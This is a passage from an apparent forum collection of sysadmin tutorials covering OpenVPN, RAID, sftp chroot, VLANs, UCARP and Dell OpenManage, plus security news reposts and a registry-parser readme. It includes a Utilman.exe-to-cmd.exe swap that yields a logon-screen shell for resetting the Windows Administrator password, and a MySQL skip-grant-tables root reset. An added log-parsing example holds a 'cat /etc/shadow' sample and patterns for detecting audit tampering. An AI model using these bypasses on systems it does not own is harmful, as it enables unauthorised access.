      Now on the command prompt, run these commands:
      ```
      d:
      cd windows\system32
      ren Utilman.exe Utilman.exe.old
      copy cmd.exe Utilman.exe
      ```
      6) Close the command prompt and click "Continue".
      7) The server will now boot and present the logon screen. Here press Windows Key + U
      8) In the prompt you can now change the password by typing the command:
      ```
      net user administrator Password
      ```
      This will set the password for Administrator to Password (case sensitive). Close CMD and you should be able to log back onto the server using the password you provided in the last step.

      Author: razvan1@hy
  13. Hello all,

      Today we will install an OpenVPN server. For this, copy/paste this script (edit the email, VPN DNS name and client certificate name as you need). After this, run `chmod +x openvpn.sh && ./openvpn.sh` and run all the steps shown from 1 to 16 (17 is quit). To run each step, when `#?` appears press 1, after it is done press 2, and so on until 16.

      Enjoy

      ```bash
      #!/bin/bash
      #title          :openvpn.sh
      #author         :razvan1@hy
      #date           :20141209
      #usage          :Put in to /root directory and bash -X openvpn.sh
      #==============================================================================

      SELECTION="update-os test-tun install-ovpn add-vars import-vars delete-old-certs generate-ca generate-cert generate-dh generate-client generate-hmac place-certs conf-ovpn-server forwarding set-iptables restart-ovpn quit"

      select options in $SELECTION; do
        if [ "$options" = "update-os" ]; then
          echo "Updating OS!"
          apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
        elif [ "$options" = "test-tun" ]; then
          echo "Test if it supports TUN!"
          test ! -c /dev/net/tun && echo openvpn requires tun support || echo tun is available
        elif [ "$options" = "install-ovpn" ]; then
          echo "Install OpenVPN"
          apt-get install openvpn -y && cp -prv /usr/share/doc/openvpn/examples/easy-rsa/2.0 /root/easy-rsa && cd /root/easy-rsa && cp vars{,.orig}
        elif [ "$options" = "add-vars" ]; then
          echo "Add vars"
          # Appended (not overwritten) so the defaults the stock vars file sets (EASY_RSA,
          # KEY_DIR, KEY_SIZE, ...) survive; clean-all and build-* need KEY_DIR. The quoted
          # heredoc delimiter writes the lines verbatim, nested quotes included.
          cat >> /root/easy-rsa/vars <<'EOF'
      export KEY_COUNTRY="RO"
      export KEY_PROVINCE="B"
      export KEY_CITY="Bucuresti"
      export KEY_ORG="ORG_name"
      export KEY_EMAIL="user@mail.ro"
      export KEY_CN=vpn.domain.ro
      export KEY_NAME=vpn.domain.ro
      export KEY_OU=IT
      #export PKCS11_MODULE_PATH=changeme
      #export PKCS11_PIN=1234
      EOF
        elif [ "$options" = "import-vars" ]; then
          echo "Import vars"
          cd /root/easy-rsa/ && source ./vars
        elif [ "$options" = "delete-old-certs" ]; then
          echo "delete previously created certs"
          cd /root/easy-rsa/ && ./clean-all
        elif [ "$options" = "generate-ca" ]; then
          echo "generate the CA certificate"
          cd /root/easy-rsa/ && ./build-ca
        elif [ "$options" = "generate-cert" ]; then
          echo "generate VPN server certificate"
          cd /root/easy-rsa/ && ./build-key-server SERVER
        elif [ "$options" = "generate-dh" ]; then
          echo "generate the Diffie-Hellman PEM certificate"
          cd /root/easy-rsa/ && ./build-dh
        elif [ "$options" = "generate-client" ]; then
          echo "generate client certificate"
          cd /root/easy-rsa/ && ./build-key razvan1
        elif [ "$options" = "generate-hmac" ]; then
          echo "generate secret Hash-based Message Authentication Code (HMAC)"
          /usr/sbin/openvpn --genkey --secret /root/easy-rsa/keys/ta.key
        elif [ "$options" = "place-certs" ]; then
          echo "place the certificates and keys on the server in the /etc/openvpn/certs directory"
          # dh2048.pem assumes KEY_SIZE=2048 in vars; the dh line in server.conf below must match
          mkdir -p /etc/openvpn/certs && cp -pv /root/easy-rsa/keys/{ca.{crt,key},SERVER.{crt,key},ta.key,dh2048.pem} /etc/openvpn/certs/
        elif [ "$options" = "conf-ovpn-server" ]; then
          echo "set-up OpenVPN server configuration file in /etc/openvpn/server.conf"
          # Quoted heredoc keeps the double quotes that the push directives require
          cat > /etc/openvpn/server.conf <<'EOF'
      port 1194
      proto udp
      dev tun
      ca /etc/openvpn/certs/ca.crt
      cert /etc/openvpn/certs/SERVER.crt
      key /etc/openvpn/certs/SERVER.key
      dh /etc/openvpn/certs/dh2048.pem
      tls-auth /etc/openvpn/certs/ta.key 0
      server 10.0.0.0 255.255.255.0
      ifconfig-pool-persist ipp.txt
      push "redirect-gateway def1 bypass-dhcp"
      push "dhcp-option DNS 8.8.8.8"
      push "dhcp-option DNS 8.8.4.4"
      client-to-client
      keepalive 20 120
      client-config-dir ccd
      # DES-EDE3-CBC (3DES) is a legacy cipher; AES-256-CBC is the usual choice today
      cipher DES-EDE3-CBC
      comp-lzo
      max-clients 10
      user nobody
      group nogroup
      persist-key
      persist-tun
      log /var/log/openvpn.log
      status /var/log/openvpn-status.log
      verb 5
      mute 20
      EOF
          mkdir -p /etc/openvpn/ccd
        elif [ "$options" = "forwarding" ]; then
          echo "enable network forwarding"
          echo 1 > /proc/sys/net/ipv4/ip_forward && sysctl -p
        elif [ "$options" = "set-iptables" ]; then
          echo "set-up the following iptables rules"
          /sbin/iptables -A INPUT -p udp -m state --state NEW -m udp --dport 1194 -j ACCEPT
          /sbin/iptables -A FORWARD -s 10.0.0.0/24 -j ACCEPT
          /sbin/iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
          /sbin/iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -o eth0 -j MASQUERADE
        elif [ "$options" = "restart-ovpn" ]; then
          echo "start the OpenVPN server and enable it to run on system start-up"
          service openvpn restart && update-rc.d -f openvpn defaults
        elif [ "$options" = "quit" ]; then
          echo "You have selected $options"
          exit
        else
          clear
          echo "please select some options"
        fi
      done
      ```

      Credits to: razvan1@hy
  14. ```bash
      sudo apt-get update
      sudo apt-get dist-upgrade
      cd ~/
      wget https://raw.github.com/flexiondotorg/oab-java6/master/oab-java.sh -O oab-java6.sh
      chmod +x oab-java6.sh
      sudo ./oab-java6.sh
      sudo apt-get install ant
      # -O keeps the mirror query string out of the saved file name
      sudo wget 'http://downloads.sourceforge.net/project/openvpn-als/adito/adito-0.9.1/adito-0.9.1-bin.tar.gz?use_mirror=iweb' -O adito-0.9.1-bin.tar.gz
      sudo mv adito-0.9.1-bin.tar.gz /opt/
      cd /opt
      sudo tar -xzf adito-0.9.1-bin.tar.gz
      cd adito-0.9.1
      sudo ant install
      ```
      Using a browser go to: http://ip_server:28080

      Create new cert
      Step 1 – Set Keystore Passphrase – Type password twice for Cert
      Step 1 – Create New Certificate – Fill out Form
      Step 2 – Configure User Database – Built-in
      Step 3 – Configure Super User – Fill out Form
      Step 4 – Configure Web Server – Leave defaults
      Step 5 – Configure Proxies – Leave blank unless you use a proxy – Hit Next
      Step 6 – Summary Install Complete

      Go to the CLI and exec:
      ```bash
      sudo ant install-service
      sudo ant start
      sudo pico /opt/adito-0.9.1/conf/wrapper.conf
      ```
      Delete the # from wrapper.java.additional.2=-Dfile.encoding=UTF-8
      ```bash
      sudo shutdown -r 1
      ```
      Author: razvan1@hy
15.
Step # 1: Stop MySQL service
# /etc/init.d/mysql stop
Output:
Stopping MySQL database server: mysqld.
Step # 2: Start MySQL server w/o password:
# mysqld_safe --skip-grant-tables &
Output:
[1] 5988
Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started
Step # 3: Connect to MySQL server using mysql client:
# mysql -u root
Output:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.15-Debian_1-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
Step # 4: Set up new MySQL root user password
mysql> use mysql;
mysql> update user set password=PASSWORD("new_passwd") where User='root';
mysql> flush privileges;
mysql> quit
Step # 5: Stop MySQL Server:
# /etc/init.d/mysql stop
Output:
Stopping MySQL database server: mysqld
STOPPING server from pid file /var/run/mysqld/mysqld.pid
mysqld_safe[6186]: ended
[1]+ Done mysqld_safe --skip-grant-tables
Step # 6: Start MySQL server and test it
/etc/init.d/mysql start
mysql -u root -p
Credits to: razvan1@hy
16. To begin, add the following code to a file named log_users:
#!/bin/bash
# Author razvan1
# If you have any issues send a PM on hackyard.net/forum
FILE=/etc/bash.bashrc
FILE1=/etc/rsyslog.d/bash.conf
FILE2=/etc/init.d/rsyslog
FILE3=/etc/logrotate.d/rsyslog

if [ -f $FILE ]; then
  # Quoted heredoc: nothing is expanded now, so $?, $(whoami), $$ and the
  # history lookup are evaluated each time the prompt is drawn.
  cat >> $FILE <<'EOF'
export PROMPT_COMMAND='RETRN_VAL=$?;logger -p local6.debug "$(whoami) [$$]: $(history 1 | sed "s/^[ ]*[0-9]\+[ ]*//" )[$RETRN_VAL]"'
EOF
else
  echo "File $FILE does not exist"
  exit 0
fi

if [ -f $FILE1 ]; then
  echo "File $FILE1 exists. Delete it"
  exit 0
else
  touch /var/log/commands.log
  echo "local6.* /var/log/commands.log" >> $FILE1
fi

if [ -f $FILE3 ]; then
  # rotate the new log with the rest of rsyslog's logs: add it after /var/log/messages
  sed -i '/\/var\/log\/messages/a /var/log/commands.log' $FILE3
else
  echo "File $FILE3 does not exist"
  exit 0
fi

if [ -f $FILE2 ]; then
  service rsyslog restart
else
  echo "File $FILE2 does not exist."
  read -p "Install rsyslog? [y/N] " -n 1 -r
  echo
  if [[ $REPLY =~ ^[Yy]$ ]]; then
    apt-get install rsyslog -y
  else
    exit 0
  fi
fi
After this step use the command chmod +x log_users to be able to run the script, and enjoy it.
Author: razvan1@hy
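Added here as a defender-side example, not part of the post: a parser for the lines the PROMPT_COMMAND logger above writes to /var/log/commands.log, with two checks run over constructed sample lines (the host name web1, the user dan and the commands are made up). The tampering check is an addition of this example and is not something the post describes.

```shell
#!/bin/sh
# Added example, not part of the post: parse the lines that the PROMPT_COMMAND
# logger above writes (rsyslog traditional format, logger tag = login name):
#   "<date> <host> <tag>: <user> [<pid>]: <command>[<exit status>]"
# SAMPLE_LOG is constructed; web1, dan and the commands are made up.
SAMPLE_LOG='Mar 20 10:15:01 web1 root: root [2231]: apt-get update[0]
Mar 20 10:15:09 web1 dan: dan [2410]: sudo cat /etc/shadow[1]
Mar 20 10:15:12 web1 dan: dan [2410]: unset PROMPT_COMMAND[0]
Mar 20 10:16:40 web1 dan: dan [2410]: history -c[0]'

# stdin: raw log lines; stdout: tab-separated "user pid exit_status command"
parse_commands() {
    awk '{
        user = $6
        pid = $7; gsub(/\[|\]|:/, "", pid)
        cmd = $8
        for (i = 9; i <= NF; i++) cmd = cmd " " $i
        # the exit status is the trailing [N] that PROMPT_COMMAND appends
        rc = cmd; sub(/.*\[/, "", rc); sub(/\]$/, "", rc)
        sub(/\[[0-9]+\]$/, "", cmd)
        printf "%s\t%s\t%s\t%s\n", user, pid, rc, cmd
    }'
}

# Commands that exited non-zero: a quick way to spot probing of files
# the user cannot read.
failed_commands() {
    parse_commands | awk -F '\t' '$3 != 0'
}

# Commands whose purpose is to blind this logging itself (added check):
# disabling PROMPT_COMMAND, clearing the history, or touching the
# files the log_users script writes.
tamper_attempts() {
    parse_commands | awk -F '\t' '
        $4 ~ /^(unset|export) PROMPT_COMMAND/ ||
        $4 ~ /^history -c/ ||
        $4 ~ /bash\.bashrc/ ||
        $4 ~ /commands\.log/'
}

echo "== failed commands =="
printf '%s\n' "$SAMPLE_LOG" | failed_commands
echo "== tampering with the audit trail =="
printf '%s\n' "$SAMPLE_LOG" | tamper_attempts
```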
17. For this, let's say that sda is the first HDD and sdb is the second one. To do this we must go through some steps:
- Partitioning
- Configure boot device
- Create the new swap device
- Configure LVM
- Configure Grub
For the first step, Partitioning, we do the following:
sfdisk -d /dev/sda > disks.out
sfdisk /dev/sdb < disks.out
parted /dev/sda set 1 raid on
parted /dev/sda set 2 raid on
parted /dev/sda set 3 raid on
parted /dev/sda set 5 raid on
parted /dev/sdb set 1 raid on
parted /dev/sdb set 2 raid on
parted /dev/sdb set 3 raid on
parted /dev/sdb set 5 raid on
mdadm --create /dev/md0 --level=1 --raid-disks=2 missing /dev/sdb1 --metadata=0.90
mdadm --create /dev/md1 --level=1 --raid-disks=2 missing /dev/sdb2 --metadata=1.0
mdadm --create /dev/md2 --level=1 --raid-disks=2 missing /dev/sdb3 --metadata=1.0
mdadm --create /dev/md3 --level=1 --raid-disks=2 missing /dev/sdb5 --metadata=1.0
After that we must configure the boot device:
mkfs.ext4 /dev/md0
mkdir /mnt/md0
mount /dev/md0 /mnt/md0
cp -dpRx /boot/* /mnt/md0
sync
umount /mnt/md0
rmdir /mnt/md0
umount /boot
mount /dev/md0 /boot
mdadm /dev/md0 -a /dev/sda1
mdadm -D /dev/md0
Find the UUID using the command:
blkid | grep md0
/dev/md0: UUID="d43e4912-57b3-456a-8ef2-af747d37bead" TYPE="ext4"
Update it in /etc/fstab:
# grep boot /etc/fstab
#UUID=3428cd4c1-c81b-4d94-240b-12f9020e870e /boot ext4 defaults 1 2
UUID=d43e4912-57b3-456a-8ef2-af747d37bead /boot ext4 defaults 1 2
Verify that both of your disks are listed in /boot/grub/device.map and add them if needed:
cat /boot/grub/device.map
(hd0) /dev/sda
(hd1) /dev/sdb
Install grub on both devices:
grub-install /dev/sda
grub-install /dev/sdb
Create the new swap device:
mkswap /dev/md1
swapoff /dev/sda2
mdadm --add /dev/md1 /dev/sda2
swapon /dev/md1
blkid | grep md1
Update the /etc/fstab file.
Configure LVM:
pvcreate /dev/md2
pvcreate /dev/md3
vgextend ROOTVOL /dev/md2
vgextend ROOTVOL /dev/md3
pvmove /dev/sda3 /dev/md2
pvmove /dev/sda5 /dev/md3
vgreduce ROOTVOL /dev/sda3
vgreduce ROOTVOL /dev/sda5
pvremove /dev/sda3
pvremove /dev/sda5
mdadm /dev/md2 -a /dev/sda3
mdadm /dev/md3 -a /dev/sda5
mdadm --examine --scan > /etc/mdadm.conf
Configure Grub:
Remove rd_NO_MD from the lines in /boot/grub/grub.conf
dracut -f
rm -f /etc/lvm/cache/.cache
vgscan
Entering grub:
grub
grub> find /grub/grub.conf
grub> root (hd0,0)
grub> setup (hd0)
grub> root (hd1,0)
grub> setup (hd1)
grub> quit
Author: razvan1@hy
18. To restrict a Linux user to the www folder and disable ssh access, in my example the user named user_name, we go through some steps:
1) Edit the file /etc/ssh/sshd_config and add the following lines:
AllowUsers user_name
Match User user_name
    ChrootDirectory /var/www
    ForceCommand internal-sftp
2) Edit the file /etc/passwd like in the following example:
user_name:x:1003:1002::/var/www:/bin/false
3) Add the user to the www-data group using the command:
usermod -a -G www-data user_name
4) The final step is to restart the ssh service to reload the configuration, using one of the following commands:
/etc/init.d/ssh restart
or
service ssh restart
After these steps, if we try to connect using ssh we get the following message:
root@kali:/home/razvan1# ssh user_name@192.168.1.1
user_name@192.168.1.1's password:
This service allows sftp connections only.
Connection to 192.168.1.1 closed.
Author: razvan1@hy
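Added here as an example check, not part of the post: sshd honours ChrootDirectory only when the directory and every directory above it are owned by root and writable by nobody else, otherwise the login is refused with "bad ownership or modes for chroot directory". The script walks a path and reports each component; it assumes GNU stat (-c) as found on the Linux host in the post, and the www-data example in the last line is hypothetical.

```shell
#!/bin/sh
# Added example, not part of the post: verify that a ChrootDirectory path
# meets sshd's requirement (root-owned, not group- or world-writable, for the
# directory and every parent). Assumes GNU coreutils stat.

# component_ok UID OCTAL_MODE: true if root-owned and neither g+w nor o+w.
# 18 is octal 022, the group-write and other-write bits; the leading 0 makes
# the shell parse the mode string as octal.
component_ok() {
    [ "$1" -eq 0 ] && [ $(( 0$2 & 18 )) -eq 0 ]
}

# check_chroot_path DIR: walk DIR up to / and report every component.
# Returns 0 if sshd would accept the chroot, 1 if any component fails,
# 2 if a component cannot be stat'ed.
check_chroot_path() {
    dir=$1
    rc=0
    while :; do
        info=$(stat -c '%u %a' "$dir") || return 2
        set -- $info   # $1 = uid, $2 = octal mode
        if component_ok "$1" "$2"; then
            echo "ok   $dir (uid $1, mode $2)"
        else
            echo "BAD  $dir (uid $1, mode $2): chown root and chmod 755, or sshd refuses the chroot"
            rc=1
        fi
        [ "$dir" = "/" ] && break
        dir=$(dirname "$dir")
    done
    return $rc
}

# Typical failure for the post's setup: /var/www handed to www-data (uid 33)
# with group write, so that the web server can write into it.
check_chroot_path "${1:-/var/www}" || echo "sshd would refuse this ChrootDirectory (status $?)"
```

Running it against the real /var/www before restarting sshd tells you whether step 4 of the post will lock the user out of sftp as well as ssh.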
19. To install Dell OpenManage on Debian 7 we go through some steps. Let's assume we use a clean Debian 7 install. The first step is to run the following command to update the server:
apt-get update && apt-get install sudo -y && apt-get upgrade -y
After updating the system we add some prerequisites like libssl0.9.8 using the commands:
cd /tmp && wget http://ftp.us.debian.org/debian/pool/main/o/openssl/libssl0.9.8_0.9.8o-4squeeze14_amd64.deb
dpkg -i libssl0.9.8_0.9.8o-4squeeze14_amd64.deb
Now we create a new file in sources.list.d:
echo "deb http://linux.dell.com/repo/community/ubuntu wheezy openmanage" > /etc/apt/sources.list.d/linux.dell.com.sources.list
Adding the keys:
gpg --keyserver pool.sks-keyservers.net --recv-key 1285491434D8786F
gpg -a --export 1285491434D8786F | sudo apt-key add -
sudo apt-get update
Install libcurl3 and OpenManage:
apt-get install libcurl3 srvadmin-all -y
Now we should change the run levels because the default settings have a bug. Open the file with nano /etc/init.d/dsm_om_connsvc and change Default-Start and Default-Stop like the following:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
Now we remove and add dsm_om_connsvc again with the new params:
update-rc.d -f dsm_om_connsvc remove
update-rc.d dsm_om_connsvc defaults
update-rc.d dataeng defaults
Restart the server, navigate to https://server_ip:1311 and log in with your root user and password.
Author: razvan1@hy
20. To begin we have a few prerequisites and we should install them:
apt-get install sudo rpm rpm2cpio make libwww-perl -y
The second step is to download and untar RINSE to the /usr/src/ path:
cd /usr/src/
wget http://collab-maint.alioth.debian.org/rinse/download/rinse_3.0.2.tar.gz
tar vxfz rinse_3.0.2.tar.gz
cd /usr/src/rinse
To install one of the OSes we run the command:
rinse --arch amd64 --distribution os_needed --directory ./
List of possible OSes to install:
- centos-4
- centos-5
- centos-6
- fedora-7
- fedora-8
- fedora-9
- fedora-10
- fedora-11
- fedora-12
- fedora-13
- fedora-14
- fedora-15
- fedora-16
- fedora-17
- fedora-18
- fedora-19
- fedora-core-4
- fedora-core-5
- fedora-core-6
- opensuse-10.1
- opensuse-10.2
- opensuse-10.3
- opensuse-11.0
- opensuse-11.1
- opensuse-11.2
- opensuse-11.3
- opensuse-12.1
- opensuse-12.3
- opensuse-13.1
- rhel-5
- slc-5
- slc-6
Author: razvan1@hy
21. Today we will try to load balance 2 Debian servers. This tool can be used for servers like Web, Application, Gateway and so on. The tool used for this is named UCARP and is very good for high-availability servers. To be able to use it we must install it on both servers, named in this example WS1 and WS2, using the command:
~# apt-get install ucarp -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  libpcap0.8
The following NEW packages will be installed:
  libpcap0.8 ucarp
0 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.
Need to get 165 kB of archives.
After this operation, 504 kB of additional disk space will be used.
After installing we edit the /etc/network/interfaces file on both servers. For WS1 the config file will look like the following:
auto eth0
iface eth0 inet static
    address 192.168.69.10
    netmask 255.255.255.0
    network 192.168.69.0
    broadcast 192.168.69.255
    gateway 192.168.69.1
    ucarp-vid 2
    ucarp-vip 192.168.69.2
    ucarp-password Hackyard
    ucarp-advskew 10
    ucarp-advbase 1
    ucarp-master yes
auto eth0:ucarp
iface eth0:ucarp inet static
    address 192.168.69.12
    netmask 255.255.255.255
For WS2 the config file will look like the following:
auto eth0
iface eth0 inet static
    address 192.168.69.11
    netmask 255.255.255.0
    network 192.168.69.0
    broadcast 192.168.69.255
    gateway 192.168.69.1
    ucarp-vid 2
    ucarp-vip 192.168.69.2
    ucarp-password Hackyard
    ucarp-advskew 20
    ucarp-advbase 1
    ucarp-master no
auto eth0:ucarp
iface eth0:ucarp inet static
    address 192.168.69.12
    netmask 255.255.255.255
After editing both interfaces config files we restart the interfaces using the command:
# /etc/init.d/networking restart
Now the load-balancing server is done.
Author: razvan1@hy
22. This will be the shortest tut made by me because it needs only a few changes. To begin we install the VLAN package. This is done using the command:
# apt-get install vlan -y
After this we load the 8021q module into the kernel using the command:
# sh -c 'grep -q 8021q /etc/modules || echo 8021q >> /etc/modules'
Now the only thing required is to add the VLANs to the /etc/network/interfaces file as in the following example:
auto eth1
iface eth1 inet static
    address 192.168.0.101
    netmask 255.255.255.0
    network 192.168.0.0
    broadcast 192.168.0.255
    gateway 192.168.0.254
    dns-nameserver 8.8.8.8
# VLAN 69
auto vlan69
iface vlan69 inet static
    address 172.16.69.25
    netmask 255.255.255.248
    network 172.16.69.24
    broadcast 172.16.69.31
    vlan_raw_device eth2
# VLAN 96
auto vlan96
iface vlan96 inet static
    address 10.10.96.1
    netmask 255.255.255.0
    network 10.10.96.0
    broadcast 10.10.96.255
    mtu 1500
    vlan_raw_device eth2
Now for the job to be done we restart networking and all will be done:
# /etc/init.d/networking restart
 * Reconfiguring network interfaces...
ssh start/running, process 1400
Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config
Added VLAN with VID == 69 to IF -:eth2:-
ssh stop/waiting
ssh start/running, process 1465
Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config
Added VLAN with VID == 96 to IF -:eth2:-
ssh stop/waiting
ssh start/running, process 1530
[ OK ]
To check if they are up we read the file vlan/config using the command # cat /proc/net/vlan/config. The output will be the following if all is good:
VLAN Dev name | VLAN ID
Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD
vlan69 | 69 | eth2
vlan96 | 96 | eth2
Author: razvan1@hy
23. A cross-site request forgery (CSRF) vulnerability in the website of hotel chain Hilton Worldwide could have inadvertently compromised much of its users’ personal information. Ironically, the since-fixed issue stemmed from a promotion the chain was offering to users if they changed their passwords on a benefits service it runs. As part of the offer, users who changed passwords associated with their Hilton Honors account before April 1 would be given 1,000 free awards points.
According to Krebs on Security, until Hilton fixed a loophole in its system, the same promotion could have let anyone hijack the account of someone who switched his or her password as long as the attacker could guess their nine-digit account number correctly. By reconfiguring the site’s HTML and reloading the page, attackers could have gleaned additional information, like the customers’ email address, physical address, and the last four digits of any credit card number they may have had on file.
Attackers basically would have had complete access to the person’s account. They could have changed the password associated with it, viewed upcoming and past trips, and used the victim’s points to book future trips. The vulnerability could have even let the attackers liquidate the user’s account and funnel their points into prepaid debit cards or into another user’s account.
Researchers Brandon Potter and JB Snyder at the security firm Bancsec logged into Krebs’ Hilton account and forwarded him screenshots as proof they had found a vulnerability. It was only after Krebs contacted the hotel company that it stopped allowing users to reset their passwords and fixed the issue.
“Hilton Worldwide recently confirmed a vulnerability on a section of our Hilton Honors website, and we took immediate action to remediate the vulnerability,” Hilton said in a statement, according to Krebs.
On top of the CSRF vulnerability, apparently Hilton didn’t require users to re-enter their current passwords when changing to a new one. Its site even told users whether each nine-digit number they entered was valid, according to Krebs, something which could have compounded the issue further. Attackers could have rigged the PIN reset page checker to determine users’ PINs, Snyder told Krebs.
“There are a billion combinations but this… could be easily automated,” Snyder said.
Hilton Hotels did fix the issue and now forbids users from using a PIN as their password. Instead users are prompted to pick a password that consists of at least eight characters, one uppercase letter, and a number or special character. Users can apparently still change their password without entering their current password, however.
Source
24. A four year old Adobe Flash patch did not properly resolve a vulnerable Flex application, and attackers can exploit the bug, which is said to affect some 30 percent of Alexa’s top 10 most popular sites in the world. LinkedIn security researcher Luca Carettoni and Mauro Gentile, a security consultant at Minded Security, presented their findings showing that Shockwave Flash files compiled by the vulnerable Flex software developers kit remain exploitable in fully updated Web browsers and Flash plugins.
The researchers released partial details for the vulnerability along with mitigation information. They plan to release the full details of the bug and a proof-of-concept exploit in the near future, once they are confident there is a better understanding of the bug within the general public. Carettoni and Gentile have already informed the maintainers of popular websites affected by the vulnerability, and Adobe.
If properly exploited, the bug could allow an attacker to steal information from affected systems through a same origin request forgery and even perform actions on behalf of users running vulnerable versions by performing cross-site request forgeries. In either case, the attackers would have to compel their victims to visit a maliciously crafted Web page.
In other words, the researchers say, hosting vulnerable SWF files leads to an “indirect” Same-Origin-Policy bypass in fully patched web browsers and plugins. “Practically speaking, it is possible to force the affected Flash movies to perform Same-Origin requests and return the responses back to the attacker,” the pair of researchers said in a blog post.
“Since HTTP requests contain cookies and are issued from the victim’s domain, HTTP responses may contain private information including anti-CSRF tokens and user’s data.”
Potential mitigations include recompiling Flex SDKs along with their static libraries, patching with the official Adobe patch tool and simply deleting them if they are not used.
You can find Carettoni and Gentile’s analysis on their respective sites, though these are reposts, so both reports contain the same content. Their slides are embedded below:
Source
25. Python Registry Parser
The idea of this started out as one to duplicate Microsoft's autoruns tool to the extent possible with only offline registry hives. Then I started adding extra non-autorun(ish) registry keys and then it turned into more of a Windows Registry parser; hence the name change from autoreg-parse to python-regparse. I'm terrible at naming scripts/tools so this will have to suffice.
I wrote about it here on my blog: https://sysforensics.org/2015/03/python-registry-parser.html
Purpose/Reason
I didn't like the output of other tools. I wanted to learn to write better Python code.
Output
This was a sticky point I had with alternative tools, and realizing this I thought hard and came to the conclusion that if I want a tool that doesn't have messy output I'm going to have to make it custom user-defined output, and then provide a fallback template file if a custom output isn't defined via the command line. This will likely turn some people off from using this tool, but I think it's the best way forward. I suggest taking a look here for some output examples: https://sysforensics.org/2015/03/python-registry-parser.html as it's not as complex as it may sound. Even for non-coders it's easy.
How to Install
Install Python 2.79
Install https://pypi.python.org/pypi/setuptools
sudo pip install python-registry
sudo pip install jinja2
wget https://github.com/sysforensics/python-regparse/blob/master/yapsy_mods/yapsy-master.zip
Unzip it
cd yapsy-master/package/
sudo python setup.py build
sudo python setup.py install
wget https://github.com/sysforensics/python-regparse/archive/master.zip
Unzip
Put it where you want, and then enjoy!
I've tested/used it on OSX, Windows and SIFT 3.0. If pip doesn't work for you try easy_install.
Link: https://github.com/sysforensics/python-regparse